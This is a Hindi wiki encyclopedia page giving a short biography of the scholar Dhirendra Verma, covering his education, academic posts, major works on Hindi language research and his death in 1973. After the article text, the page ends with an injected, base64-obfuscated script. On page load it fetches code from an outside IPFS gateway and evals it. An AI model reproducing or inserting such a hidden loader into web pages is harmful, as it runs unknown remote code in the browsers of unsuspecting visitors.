धीरेन्द्र वर्मा

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 06:58, 22 दिसम्बर 2012 का अवतरण (''''धीरेन्द्र वर्मा''' (अंग्रेज़ी: Dhirendra Verma जन्म- 17 मई, 1897...' के साथ नया पन्ना बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

धीरेन्द्र वर्मा (अंग्रेज़ी: Dhirendra Verma जन्म- 17 मई, 1897, उत्तर प्रदेश; मृत्यु- 23 अप्रैल, 1973, प्रयाग) हिन्दी और ब्रजभाषा के प्रसिद्ध कवि और लेखक थे। जो कार्य हिन्दी समीक्षा के क्षेत्र में आचार्य रामचन्द्र शुक्ल ने किया, वही कार्य हिन्दी शोध के क्षेत्र में डॉ. धीरेन्द्र वर्मा ने किया था। धीरेन्द्र वर्मा जहाँ एक तरफ़ हिन्दी विभाग के उत्कृष्ट व्यवस्थापक रहे, वहीं दूसरी ओर एक आदर्श प्राध्यापक भी थे। भारतीय भाषाओं से सम्बद्ध समस्त शोध कार्य के आधार पर उन्होंने 1933 ई. में हिन्दी भाषा का प्रथम वैज्ञानिक इतिहास लिखा था। फ़ेंच भाषा में उनका ब्रजभाषा पर शोध प्रबन्ध है, जिसका अब हिन्दी अनुवाद हो चुका है।

जन्म तथा शिक्षा

धीरेन्द्र वर्मा का जन्म 17 मई, 1897 को बरेली, उत्तर प्रदेश में हुआ था। उनकी शिक्षा 'इलाहाबाद विश्वविद्यालय' में हुई और उन्होंने पेरिस यूनिवर्सिटी से डी. लिट्. की उपाधि प्राप्त की थी। डॉ. वर्मा 1924 में 'इलाहाबाद विश्वविद्यालय' में हिन्दी के प्रथम अध्यापक नियुक्त हुए थे और बाद में वहीं प्रोफेसर और हिन्दी विभाग के अध्यक्ष बने। उन्होंने 'सागर विश्वविद्यालय' में भाषा विज्ञान विभागाध्यक्ष रूप में काम किया और फिर 'जबलपुर विश्वविद्यालय' के कुलपति बने।

योगदान

डॉ. वर्मा का सबसे बड़ा योगदान हिन्दी में शोध के क्षेत्र में है। इनके लिखित अथवा संपादित प्रमुख ग्रंथ हैं- 'हिन्दी भाषा और लिपि', 'हिन्दी भाषा का इतिहास', 'अष्टछाप', 'सूरसागर सार', 'मध्यदेश', 'ब्रज भाषा', 'हिन्दी साहित्य', 'ग्रामीण हिन्दी', 'हिन्दी राष्ट्र', 'हिन्दी साहित्य कोश' आदि। प्रथम 'हिन्दी विश्वकोश' के भी वे प्रधान संपादक रहे। प्रसिद्ध संस्था 'हिन्दुस्तानी अकादमी' से भी उनका दीर्घकाल तक संबंध रहा।

निधन

23 अप्रैल, 1973 में धीरेन्द्र वर्मा का देहांत हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>